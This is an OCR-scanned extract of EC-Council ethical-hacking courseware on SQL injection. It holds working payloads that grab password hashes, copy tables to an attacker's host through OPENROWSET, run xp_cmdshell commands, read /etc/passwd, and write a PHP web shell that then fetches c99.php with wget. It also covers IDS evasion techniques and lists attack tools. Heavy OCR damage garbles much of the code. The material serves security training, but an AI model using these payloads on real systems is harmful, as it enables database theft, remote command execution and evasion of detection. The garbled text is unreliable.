Attackers grab passwords through various methods. The following is the query used for password grabbing. Once the password is grabbed, the attacker might destroy the stay or steal it. At times, attackers might even succeed in escalating privileges up to the admin level. ; b eg in d e c la re @var v a r c h a r (8000) set @var=1: ' s e le c t @var=@var+1+ login+ 1/ ' +password+ from u se rs where lo g in > @var s e le c t @var as v a r in t o temp end -' and 1 in ( s e le c t v a r from tem p)--
1 ; drop ta b le temp Grabbing user names and passwords from a user defined table:
User Name John
R eb ecca Dennis
Password asd@123
q w e r tl2 3 p a ss@ 3 2 1
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
UrtifM tu>l IlM kM
SQL query
SELECT name, password FROM sysxlogins
To display the hashes through an error message, convert hashes Hex concatenate Password field requires dba access With lower privileges you can still recover user names and brute force the password SQL server hash sample
0 *0 1 0 0 3 4 7 6 7 D 5 C 0 C FA 5 F D C A 2 8 C 4 A 5 6085E65E882E71C B0ED 2503412FD 5 406U 9 FFF0 4 12 9 A 1 D 7 2 E7 C 3 1 S4 F7 2 8 4 A 7 F3 A
M
V
vS/
' and ' and ' and
SUBSTRING (0 h e x s trin g ,0 firs tin t+ l,1) + SUBSTRING (0hexstring, 0secondint+l, 1) s e le c t 0i=0i+l END
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Extract hashes through error messages: and 1 in and 1 in ' ' and 1 in ( s e le c t x from temp) -( s e le c t s u b s trin g (x, ( s e le c t s u b s trin g (x, 256, 256) from temp) 512, 256) from temp) ---
drop ta b le temp --
The hashes are extracted using: SELECT password FROM m a s te r. . s y s x lo g in s You then hex each hash: b egin @ charvalue= ' Ox' , @ i=l, @ le n g th = d a ta le n g th (@ b in v a lu e ),
s e le c t @tempint=CONVERT (in t ,S U B S T R IN G (0 b in v a lu e ,@ i,l)) s e le c t @ firstin t= F L 0 0 R (@tempint/16) s e le c t 0secondint=@tem pint (0 f i r s t i n t * 16) s e le c t 0charvalue= 0charvalu e + SUBSTRING (0 h e x s tr in g , 0 f ir s t in t + 1 ,1) + SUBSTRING (0 h e x s trin g , 0 s e co n d in t+ l, 1) s e le c t 0i= 0i+ l END
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
'; begin declare 0var v a r c h a r (8000), 0xdatel datetime, Sbinvalue v a r b i n a r y (255), @charvalue v a r c h a r (255), 0i int, length int, 0hexstring char(16) set 0var=': select 0xdatel=(select min(xdatel) from m a s t e r .d b o .sysxlogins where password is not null) begin while 0xdatel <= (select max(xdatel) from m a ster.d b o .sysxlogins where password is not null) begin select 0binvalue=(select password from m a s t e r .d b o .sysxlogins where xdatel=0xdatel), 0charvalue = ,Ox', 0i=l, 01ength=datalength(0binvalue), hexstring = '0123456789ABCDEF' while (0i<=01ength) begin declare 0tempint int, 0firstint int, 0secondint int select 0tempint=CONVERT(int, SUBSTRING(0binvalue,0i,1)) select 0firstint=FLOOR(@tempint/16) select 0secondint=0tempint - (0firstint*16) select 0charvalue=0charvalue + SUBSTRING (0hexstring,0firstint+l,1) + SUBSTRING (0hexstring, 0secondint+l, 1) select 0i=0i+l end select 0var=0var+' I '+name+'/'+0charvalue from master.dbo.sysxlogins where xdatel=0xdatel select 0xdatel = (select isnull(min(xdatel),g e t d a t e ()) from m a ster..sysxlogins where xdatel>0xdatel and password is not null) end select 0var as x into temp end end
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
'; insert into OPENROWSET(,SQLoledb' , uid=sa;pwd=Pass123;Network =DBMSSOCN;Address=myIP,80;', ,select * from mydatabase.. tablel') select * from database..tablel
'; insert into OPENROWSET('SQLoledb',uid=sa pwd=Pass12 3;Network=DBMSSOCN ;Address=myIP, 80; 1, ,select * from mydatabase.. hacked_sysdatabases' ) select * from user_database.dbo.sysobjects insert into OPENROWSET(,SQLoledb,'uid=sa;pwd=Passl23;Ne twork=DBMSSOCN;Address=myIP,80;',,select * from mydatabase..hacked_syscolumns') select * from user database.dbo.syscolumns
/Copyright by EG-CMMCil. All Rights ReServeiR^production Is Strictly Prohibited.
'uid=sa;pwd=Pass12 3;Network=DBMSSOCN;Addre
ss=myIP,80 ; ' , ,select * from mydatabase..table2') select * from database..table2
( , S Q L o le d b ', ' uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,8 0 ;', , s e le c t * from mydatabase .h ack e d _sysd ata b a se s') s e le c t from m a s te r. dbo. sysd atab ases -1; in s e r t in to OPENROWSET( , S Q L o le d b ', ' uid=sa;pwd=Passl23;Network=DBMSSOCN;Address=myIP , 80; ' , ' s e le c t * from mydatabase. . h acked _sysd atab ases') s e le c t *
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
OPENROWSET( 'S Q L o le d b ', uid=sa;pwd=Passl23;Network=DBMSSOCN;Address=myIP , 8 0 ; 1s e le c t * from m ydatabase. . hacked_syscolum ns') s e le c t * from u s e r_ d a ta b a s e . dbo. syscolumns -'; in s e r t in to OPENROWSET( ' SQ Loledb', 's e l e c t * from
'uid=sa;pwd=Passl23;Network=DBMSSOCN;Address=myIP,8 0 ;', m ydatabase. . t a b le 2 ') 1; in s e r t in to OPENROWSET( ' S Q L o le d b ', 'uid= sa;pw d= Passl23;N etwork s e le c t * from d a ta b a s e . . ta b le 2 --
d a ta b a s e . . t a b le l -
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
MySQL OS Interaction
IN/llJ jQ I_
union select 1,load_file(/etc/passwd1),1,1,1; create table temp( line blob ); load data infile ,/etc/passwd' into table temp; select * from temp;
Find passwords and execute commands Both methods are restricted by the database's running privileges and permissions
M S SQL OS Interaction
exec m aster..xp cmdshell 'ip e o n fig > t e s t . t x t ' -' ; CREATE TABLE tmp (tx t v are h ar(8000)); FROM 't e s t . t x t ' BULK INSERT tmp
; begin d eclare @data v are h ar(8000) ; se t @data-'| * ; s e le c t 0data=@data+txt+ ' | from tmp where tx tO d a ta ; s e le c t @data as x in to temp end and 1 in (s e le c t su b strin g (x ,1,256) from temp) d eclare @var sysname; se t @var = 'd e l t e s t . t x t ; EXEC m aster..xp cmdshell @var; drop tab le temp; drop tab le tmp
Attacker
Both the methods are restricted by the database's running privilege and permissions. M ySQL OS Interaction LOAD_FILE 1 union s e le c t 1 ,l o a d _ f i l e ( ' /etc/p assw d ') , 1 , 1 , 1 ; LOAD DATA IN F IL E c r e a te ta b le temp( l i n e b lob ) ; lo a d d ata i n f i l e '/e tc/p a ssw d ' in t o ta b le temp;
s e le c t * from temp; SELECT INTO OUTFILE M S SQL OS Interaction '; exec m a s te r..x p cm dshell ' ip c o n fig > t e s t . t x t ' --
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
TABLE --
tm p
(tx t
v a r c h a r (8 0 0 0 ));
BU LK
I N S E R T tm p
FROM
0 d a ta | 1 fro m
v a r c h a r (8 0 0 0 ) ; set tm p w h e r e t x t < @ d a t a ;
Q d a t a = '| 1; s e l e c t s e l e c t @ d a ta a s x i n t o
1 in
s u b s t r i n g ( x ,1 ,2 5 6 ) sysnam e; 0 v a r ; d ro p set ta b le
fro m @ var te m p ;
te m p )
-EXEC
d e c la r e var m a s t e r . . x p _ c m d s h e ll
= 'd e l t e s t . t x t '; d r o p t a b l e tm p --
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
LOAD_FILE()
The LOAD_FILE() function within MySQL is used to read and return the contents of a file located within the MySQL server
INTO OUTFILE()
The OUTFILE() function within MySQL is often used to run a query, and dump the results into a file
NULL
U N IO N
A LL
SELECT
L O A D _ F IL E ( ' / e t c / p a s s w d ') / *
U N IO N IN T O
A LL
SELECT
s y s te m ($ _ G E T [ "c o m m a n d "] )
O U T F IL E
I f successful, it w ill then be possible to run system commands via the $_GET global. The fo llo w in g is an example o f using w get to get a file : http://w ww .juggyboy.com /shell.php?com m and=w get http://w ww .exam ple.com /c99.php
If successful, the injection will display the contents of the password file.
N U L L U N IO N A L L S E L E C T N U L L , N U L L , N U L L , N U L L < ? p h p s y s t e m ( $ _ G E T [ " c o m m a n d " ] ) ; ? > ' IN T O O U T F I L E ' / v a r / w w w / j u g g y b o y . c o m / s h e l l . p h p 1/ *
If successful, it will then be possible to run system commands following is an example of using wget to get a file:
The
h t t p : / /w w w . j u g g y b o y . c o m / s h e l l . p h p ?co m m a n d = w g e t h t t p : / /w w w . e x a m p le . c o m / c 9 9 .p h p
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Reverse Pings
' ; e x e c m a s te r ..x p _ c m d s h e ll , p in g 1 0 . 0 . 0 . 7 5 '
Network Reconnaissance J J
OPENROWSET
; s e l e c t * f r o m OPENROWSET( 1S Q L o l e d b ', , u i d = s a ; p w d = P a s s l2 3 ; N e tw o rk = D B M S S O C N ; A d d re s s = 1 0 . 0 . 0 . 7 5 ,8 0 ; ' , , s e le c t * fro m t a b l e ')
xp_cmdshell
You can execute the following using the command: Ipconfig /all, Tracert myIP, arp -a, nbtstat -c, netstat -ano, route print
M l ....M
....M
M i ....M - -
A ttack er O S Shell Local N e tw o rk
Network Reconnaissance
Network reconnaissance is used to gather all the information about the network and then to check for vulnerabilities present in the network. You can execute the following using the xp_cmdshell command: Ipconfig /all, Tracert myIP, arp -a, nbtstat -c, netstat -ano, route print
An attacker uses the following techniques to gather IP information through reverse lookups: 9
Reverse DNS: When the web server logs are being processed, reverse lookup is used to
determine names of the machines accessing the server and also where the users are from, etc.
exec m a s t e r . . x p _ c m d s h e ll 1n s l o o k u p a . com M y I P ' -
Q Reverse Pings: Code for the reverse ping is: '; exec m a s te r. . xp_cm dshell 'p in g 1 0 .0 .0 .7 5 ' --
Q OPENROWSET: OPENROWSET provides a way to use data from a different server in a SQL server statement. It is also helpful to connect to data source directly through OLE DB directly without necessity of creating a linked server. ' ; s e le c t * from OPENROWSET( 'S Q L o le d b ', 'uid = sa; pwd=Passl23; Network=DBMSSOCN; Address=10. 0 . 0 . 75, 80; ' , 's e l e c t * from t a b l e ')
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
(rtifwd
CEH
itkitjl
declare @var varchar (256); set @var = 1 del test.txt ss arp -a test.txt ss ipconfig /all test.txt ss nbtstat c test.txt s s netstat -ano test.txt ss route print test.txt ss tracert -w 10 -h 10 google.com test.txt1; EXEC master..xp_cmdshell Qvar '; CREATE TABLE tmp FROM ,test.txt (txt varchar (8000) ) ; BULK INSERT tmp
begin declare data varchar(8000) ; set @data=': ' ; select @data=@data+txt+ I from tmp where txt<@data ; select Sdata as x into temp end ' and 1 in (select substring (x,1,255) from temp) declare @var sysname; set @var = ,del test.txt'; EXEC master..xp_cmdshell Gvar; drop table temp; drop table trap
j j
N ote: M icroso ft has disabled x p _ c m d s h e ll by defa ult in SQL Server 2005/2008. To enable this feature EXEC s p _ c o n f i g u r e ' x p _ c m d s h e l l ' , 1 GO RECONFIGURE Copyright by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
d e c la r e | '
@ d a ta fro m
@ d a t a = ': @ d a ta
s e le c t te m p
tx t< 0 d a ta
s e le c t
in t o
s u b s t r i n g ( x ,1 ,2 5 5 )
fro m
te m p )
-EXEC m a s t e r . . x p _ c m d s h e ll
'; d e c la r e 0 v a r ; d ro p
0 v a r sysnam e; s e t 0 v a r = ,d e l t a b l e t e m p ; d r o p t a b l e tm p -
t e s t . t x t ';
Ethical Hacking and Countermeasures Copyright by EC-C0UllCil All Rights Reserved. Reproduction is Strictly Prohibited.
x p _ c m d s h e ll
' x p _ c m d s h e ll' ,
0 (1 1 G O
j ; a rp c -a >>
http://www.juggYboy.com
@ var v a r c h a r ( 2 5 6 ) ; te s t.tx t && tra c e rt && -w ip c o n fig -a n o -h Jvar 10 10 && n e t s t a t set @ var = ' d e l &&
d e c la r e
te s t.tx t
te s t.tx t g o o g le .c o m
ro u te
te s t.tx t
t e s t . t x t ';
v a rc h a r(3 0 0 0 )) ;
B U LK
IN S E R T
tm p
te s t.tx t1 d e c la r e @ d a ta 1 in as @ d a ta x in to v a r c h a r (8 0 0 0 ) |
'
b e g in s e le c t s e le a t
se t
@ d a t a = ':
'
; ;
0 d a ta = @ d a ta + tx t+
fro m end
tm p
w h e re
tx t< 0 d a ta
te m p
j j
1 and
( s e le c t @ var
s u b s t r in g ( x , 1 ,2 5 5 ) set @ var =
fro m
te m p )
-EXEC tm p - -
d e c la r e
sysnam e;
,d e l
te s t.tx t; d ro p
m a s t e r . . x p _ c m d s h e ll
@ v a r;
d ro p
ta b le
te m p ;
ta b le
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Module Flow
CEH
4
V
M odule Flow
Attackers can also make use of tools to perform SQL injection attacks. These tools help
attackers carry out various types of SQL injection attacks. The SQL injection tools make the attacker's job easy.
t</ *
) Evasion Techniques
-J
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
SQL Injection
c
(rtifwtf
ithnai M ath *
EH
IL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection lerabilities virtually in any database
BSQL Hacker v0.9.0.9 Beta but Getting There!
Fie ji J Templets Injection jmport Start Edit Stop Exploits MSSQL / Injection Wizard 3< Delecbon
Help Fie
- lest Injection
Jerrplatts
Injection
jmpcrt
Edit Stop
Exploits MSSQL
Help
Requeel 1 * * * o n | @
is j E-tscied D a ta b a s e
Setti-gs
Exacted D atabase
Sea ch Ea3 Tim Based | D w BW xJ Based Ercr Baaed D eterm ine Wferencee Autom ates?
K 4
*HTMlxMEADxnwta cortori ',cxJ/ltH oharget^jtf 8"> < TlTL> 302 M ov*d</TITLE> < /H EA D >< BO D Y>< H1 > 3 0 2M o*d< /HI>The d ovtd<A </800Yx/HTML>
* a *
< H T M L:> < M EA D > < x n eta Ntp quo cotor<. ',od-hH 0Nx9ctjtf 8'> < T1TLE> 302 M oved< /TITLE> c/HEADxBODY><H1>302 M oved< /H 1 > The doem nent vtd<A HREF>py,Ww.ooo<N.oo </800Yx/HTML>
] *ep*c*on Log 0)
M6 *H a t o r y
EG-G*ancil. All
Time-based blind SQL injection Deep blind (based on advanced time delays) SQL injection Error-based SQL injection
Can automate most of the new SQL injection methods those relies on blind SQL injection RegEx signature support Console and GUI support
9 9 b Q Q
Load/save support Token/Nonce/ViewState etc. support Session-sharing support Advanced configuration support Automated attack mode, automatically extract all database schema and data mode
BSQL Hacker v0.9.0.9 Beta but Getting There!
: ! I- 1 I *
Help
>
r
Fie
\ & A
BSQL Hacker v0.9.0.9 Beta but Getting There! Template} Injection Import StartStop Edit Exploits Help
F3e
Templates
Injection
^ Test Injection
I Bdra^ted Database
/ Injectton Wizard
. < : Detection - *Request & Injection O Settings |http /Aww google com
C D*oo Btnd
Request Count 9C4 0 Request history > HTML>cHEAD>aneta http-equw"" contenttype contert *'\ert/html .charsetutf-8><TITLE< 302 Moved</TITLE>c/HEAD><BODr>cH1 >302 Movedc/Hl>Thedxvnert .> has moved<AHREF-"http ://www google.co in/'>here</A BODY></HTMl/< <
Speed 28 391/$
n .......y ............................................
R e q u e s th is to ry
54 3 1 -302-221 54 3 1 302 2 2 1 54 3 1 302 2 2 1 54 3 1 302 2 2 1 54 3 1 302 2 2 1 54 32-302-221 54 32-302-221 5432-302-221 54 32 -302 -2 2 1 5432 -302 2 2 1
@ yvaoie istory
5431-302-221 54 31-302-221 54 31-302-221 543 1 302 2 2 1 54 3 1 -302 -2 2 1 54 32 -302 -2 2 1 54 32-302-221 54 32-302-221 54 32 -302 -2 2 1 54 32 -302 -2 2 1
@ snaole Hrtory
<HTML:><HEAD>aneta Ntp-equw*"ecrtentt}pe'' content ',lert/htrH.charseturf-8'xTlTLE>302 Movedc/TITLEx/HEADxBODVxHI >302 Moved</H1>The ckxxjnert has moved<AHREF-"http ://www google W " dhere< /A > .
.0 0
> . Web Preview"] ij^ H T M L j[~Raw Request | /ftppfc=abor Log (1) Attack Succesfully Finished!
Web Preview
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r cu
V
UrtfW < ItkKjl N mIm
i
^
tH
Using Marathon Tool, a malicious user can send heavy queries to perform a Time-Based Blind SQL Injection attack
SSL support
http://m arathontool. codeplex. com Copyright by EG-GlOOCil. All Rights Reserved. Reproduction is Strictly Prohibited.
Data extraction from Microsoft Access 97/2000/2003/2007 databases Parameter injection using HTTP GET or POST SSL support HTTP proxy connection available Authentication methods: Anonymous, Basic, Digest, and NTLM
Variable and value insertion in cookies (does not support dynamic values) Configuration available and flexible for injections
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Configuration | Database schema | Debug log Basic configuration Database engrte Target base URL: Microsoft SQL Server http ://www/google com/ Get O Post SSL
! OK
Injection options Min. heavy query time HTTP request timeout Pause after heavy query: Pause after any query
Repeat tests count: Min joins for quenes Max jonsfor quenes Enable equal gn in selects
2 0 3 C 1 5 :
Start injection
Initialize
G <
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
S Q L I n j e c t i o n T o o l: S Q L P o w e r In je c to r
Fit U se Cookie Fpr Load Page Tools ?
C EH
[GEnhnpiJiiuaNimriNDiMtaRh
1 Cookie Paramctere
I> r
l 1 1 u* 00>%28SELECT.LN X28X2S%26 Uwl*-1&c op*!***-UTF-Mli-vtM-TOa^.-fCwA-wHx.-O-iVF^XXWuV/^rtyl T\S,FUM*\lvN2JiicSbW91UDijHK}j la true p-250>%28SELECT<LENX28 X29<%2Sloaalo>1&cooM S & UTF 8*fr-yt> 17041vc-FCoafaoaltoc-d-kVFaXWrfuWTtm* TV3FNrMPJvN2fncSbW9IUDpHKhu la true p- 125>X28SELECT LEN%28 X29<\2etooalo-1&co<>-ms&-UTf: 8*fr-A> 1 700*c-fCoatoc.1toc-d-kVFaXI< > 4uW 7tm 4 TV3FMrMPJvN2fncSbW9IUDpHKhu I. true p-6?>X?8SI 11(. I tl I ti'/./&'+./$ ~/Mr>fl0lr- I Hr op- An-I I 1 1 AMAve- p.ontora] Ipc-d-fcV 1 * W /V> 4_I V>l N rM f1Jv^rTr.,*> W D II DpHIKhun Itliu r p-*!!1>%y8SI II CI I I N%28%79*%7Clo9glr-1Acap_fl1-Ulf -8AI! -y4p-+ -A M & w - |( 'a1A jr-% J I!* J0(MW/fcn4_I V d U M rJvN * ' I1W91IQpHI U iiu - p % 2 8 < 15* SELECTLENV.2S%29%2CUxigl1;(& op-nwA-UTF-Mf<-HlM-XMiM c-fCjluw1IU--<HlW4)4(MuWM TVPN > M IPJN 21111SU^11JD|> HII01ta> la true p % 2 8 < 7> SELECTLENX28X29 t26100010-tAeop-mM&c-<JTF SAfr-yfc I 704&wc-fCodoon] fpc-d-kVFi<MAV7Trf TVBPNrM*JJvN2lncSI>W9UJOpHt> Is true p-3>%2BS!:1r:CT*IIN%?8%79tX.Wo00te-l*co<>>tftAet-|Jtl SAfr-y%>t tpr-MVI O O ^ M !A V/tm 4 1 71 tJiMII'. lvN/%rr- f> Y/l II llipll**. IstriM; p-l>X?BSIin^CTtlFNX?8X2, J.X/6looelc-lcop-ms*r-4ill Ah-y%> *MAvr- | Ipr-d-fcM \XKM W/tm_1 71 , NrMJvN ^ % rr tM.1 1 111 (4
SQL Power Injector is an application created in .Net 1.1 that helps the penetration tester to find and exploit SQL injections on a web page
h ttp://www. sq !powerinjector. com
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Urtiftetf ttkujl lUck*
w ty Q tt .c o m / n p g x .a g )3 * !1 2 3
n e jw o r t t !** (Z
* M !w r 1 [] is 3 ; twiu|1 u 1 0 ; 0? !* !* 1 * * y ft w n lM I0 N ln * c m 1 1 d i* < ah im o i fiI ?lllC h M * K 1 * J * *UM C m M* u h M M c t ll A m * A o ft*In d c c u m ic o ir D n N ib U L # ! 1 c > 1 Iw * > x 4M f t r ik / 4 0 t > w < v M 1 f cM 4 CJ( 1 W rvW [VD LJF c < o n n d n c to r a r iS k O M R k m k i e ! : inita
C x i
S Q L I n j e c t i o n T o o l s : H a v ij
Source: http://www.itsecteam.com Havij is an automated SQL injection tool that helps attackers find and exploit SQL Injection vulnerabilities on a web page. With the help of this tool, an attacker can perform backend database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements, and even accessing the underlying file system and executing commands on the operating system.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
!n o
frtty/f^ww.urgttcom/^dtK.iepyia-123
Havij
I* U*
PoiIDm
P w iD ^ ta
Retd n o
OndS'fiff
flurry
Find Adm
Jl
FV oN f. | 19080 I CeMnnCart: Tiws otf toccnd) 10| ~ | g | |p || | |
[v} HBp feadas Uan Agrt L&dCoo.c Airt'entctfon D*lJ<r1 (*ctcn /ak*
SUtvr: OLE
S tM u er r n ID L E
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Urti*W
CEH
itkM l lUckw
Q
[)
BobCat
http://w w w .northern-m onkee.co.uk
sqlmap
h ttp ://sq lm a p . org
uuu a
-------
Pangolin
http://n ose c.org
Absinthe
h ttp ://w w w .darknet.org. uk
SQLPAT
h ttp ://w w w .cq u re .n e t
SQL I n je c tio n T o o ls
There are some more SQL injection tools that attackers can use to perform SQL injection attacks. These include: e SQL Brute available at http://www.gdssecurity.com BobCat available at http://www.northern-monkee.co.uk
Q Sqlninja available at http://sqlninja.sourceforge.net Q sqlget available at http://www.darknet.org.uk Q Absinthe available at http://www.darknet.org.uk Q Blind Sql Injection Brute Forcer available at http://code.google.com Q e e 9 sqlmap available at http://sqlmap.org SQL Injection Digger available at http://sqid.rubyforge.org Pangolin available at http://nosec.org SQLPAT available at http://www.cqure.net
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Sqllnjector
h ttp ://w w w . woanware. co. uk
FJ-lnjector Framework
http://so urcefo rg e . net
Exploiter (beta)
h ttp ://w w w . ibm.com
3 ^
W
L Jp S r J
SQL Inject-Me
http://labs.securitycompass.com
111 j
Sqlsus
http://sqlsus.sourceforge.net
SQLEXEC() Function
h ttp ://m s d n . microsoft. com
The Mole
h ttp://them ole.nasel.com .ar
S Q L I n j e c t i o n T o o l s ( C o n t d)
In addition to the previously mentioned tools, a few more SQL Injection tools are readily available in the market and are listed as follows: a e FJ-lnjector Framework available at http://sourceforge.net Exploiter (beta) available at http://www.ibm.com
Q SQLIer available at http://bcable.net Q Sqlsus available at http://sqlsus.sourceforge.net Q e Q e e a SQ LEXEC () Function available at http://msdn.microsoft.com Sqllnjector available at http://www.woanware.co.uk Automagic SQL Injector available at http://www.securiteam.com SQL Inject-Me available at http://labs.securitycompass.com NTO SQL Invader available at http://www.ntobiectives.com The Mole available at http://themole.nasel.com.ar
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u le F lo w
Evasion techniques are the techniques adopted by the attacker for modifying the attack payload in such a way that they cannot be detected by firewalls. Simple evasion techniques include hex encoding, manipulating white spaces, in-line comments, manipulating white spaces, sophisticated matches, char encoding, and hex coding and they are discussed in detail on the following slides.
|j|||r
Evasion Techniques
!/
V
Countermeasures
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
E v a d in g IDS
*.... >
CEH
Internet
Firewall
IDS Filters
Attackers use evasion techniques to obscure input strings in order to avoid detection by signature-based detection systems Signature-based detection systems build a database of SQL injection attack strings (signatures) and then compare input strings Attacker Security Admin against the signature database at runtime to detect attacks
M #
p 1
.... 1
OS Shell Actual Data Database W eb Application
Copyright by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
Network
E v a d in g ID S s
Attackers use evasion techniques to obscure input strings in order to avoid detection by signature-based detection systems. Signature-based detection systems build a database of SQL injection attack strings (signatures) and then compare input strings against the signature database at runtime to detect attacks. If any information provided matches the attack signatures present in the database, then it immediately sets off an alarm. This kind of problem is more in network-based IDS systems (NIDSs) and also in signature-based NIDS systems. So attackers should be very careful and try to attack the system by bypassing the signature-based IDS. Attackers use evasion techniques to obscure input strings in order to avoid detection by signature-based detection systems.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Network
OS Shell
Actual Data
Web Application
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
lE ?
In-line C o m m e n t
O b scures input strings by inserting in-line co m m e n ts b e tw e e n S Q L keyw o rds
Hex Encoding
Uses h ex adecim al en co din g to re p rese n t a SQ L q u e ry string
C har Encoding
U ses built-in CH A R fu n ctio n to re p rese n t a c h a ra c te r
O bfuscated Codes
O b fuscated co d e is an SQ L sta te m e n t th a t has b een m a d e difficult to u nd erstan d
T y p e s of S ig n a tu re E v a sio n T e c h n iq u e s
The following are the various types of signature evasion techniques: 9 e e
Sophisticated Matches: Uses alternative expression of "OR 1=1". Hex Coding: Uses hexadecimal encoding to represent a SQL query string. Manipulating White Spaces: W hite space diversity is one of the signatures used to
prevent SQL injection attacks. In this, a sequence of two or more expressions are separated by a white space for a simple reason. A single word SELECT may generate a lot of false positives. The expression UNION SELECT may generate a good signature. If the signature isn't built properly, the signature is of no use and is highly prone to attacks.
In-line Comment: Obscures input strings by inserting in-line comments between SQL
keywords.
Q e
Char Encoding: Uses built-in CHAR function to represent a character. String Concatenation: Concatenates text to create SQL keyword using DB specific
instructions.
Obfuscated Codes: Obfuscated code is a SQL statement that has been made difficult to
understand.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
?Paraml=foo&Parara2=bar
URL
(?variable local variable 00variable global variable waitfor delay '0:0:10' time delay
An IDS signature may be looking for the 'OR 1=1. Replacing this string with another string will have same effect.
E v a sio n T e c h n iq u e : S o p h istic a te d M a tc h e s
Attackers use the sophisticated matches evasion technique to trick and bypass user authentication. This uses an alternative expression of "OR 1=1" Attacker uses OR 1=1 attack OR ljohn,=ljohn' If this doesn't work, the attacker tricks the system by adding N to the second string. 'Or 'movies'=N'movies'. This method is very useful in signature evasion for evading advanced systems.
multiple-line comment
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
PRINT useful as non-transactional command variable local variable( variable global variable (( waitfor delay '0:0:10' time delay Evading ' OR 1=1 signature 'OR 'j 0 hn' = ,john 1 'OR 'microsoft' = ,micro'+'soft ' 'OR 'movies' = N'movies ' '% OR 'software' like 'soft ' OR ' 7 < 1 OR 'best' > ,b 1 ' )'OR 'whatever' IN ('whatever OR 5 BETWEEN 1 AND,
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
For example, the string 'SELECT1can be represented by th e hexadecimal num ber 0x73656c656374,
t o
DROP Table CreditCard =0x44524f502054 61626C652043726S64697443617264 INSERT into USERS ('Juggyboy', 'qwerty') = 0x494e5345525420696e74 6f2055534552532028274a7 5676779426f79272c202771 77657274792729
E v a sio n T e c h n iq u e : H ex E n c o d in g
Hex encoding is used to represent characters in URLs. Some URLs contain %20; that is a hex encoding. %20 is used as a single space as the URL doesn't have any actual spaces. Most alphanumeric characters use hex encodings. Many intrusion detection systems (IDSs) don't recognize hex encodings. This feature is utilized by attackers. Hex coding provides countless ways for attackers to obfuscate each URL. The hex encoding evasion technique uses hexa decimal encoding to represent a string. For example, The string 'SELECT' can be represented by the hexadecimal number 0x73656c656374, which most likely will not be detected by a signature-protection mechanism.
(@x)
This statement uses no single quotes (').
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
W hite space manipulation technique obfuscates input strings by dropping or adding white spaces between SQL keyword and string or number literals without altering execution of SQL statements
Adding white spaces using special characters like tab, carriage return, or linefeeds makes an SQL statement completely untraceable without changing the execution of the statement "U N IO N S E L E C T signature is different from U NIO N S E L E C T "
Dropping spaces from SQL statements will not affect its execution by some of the SQL databases 'O R '!'( ' !' with no spaces)
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Evade signatures th a t filter w h ite spaces J In this technique, white spaces between SQL keywords are replaced by inserting in-line comments J /* ... * / is used in SQL to delimit
> 3
rr
rr 0r r rr
T r
multirow comments U N IO N / ** / S E L E C T / ** / '/ * * / O R / * * / l / * * / = / * * / l J This allows to spread the injection commands through multiple fields USERNAME: PASSWORD: o r 1 /* */ =1
E v a sio n T e c h n iq u e : In -lin e C o m m e n t
Evade signatures that filter white spaces. In this technique, white spaces between SQL keywords are replaced by inserting in-line comments. /* ... * / is used in SQL to delimit multirow comments
U N IO N / * * / S E L E C T / * * / 1/ * * / 0 R / * * / l / * * / = / * * / l
=1 -
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
i
w
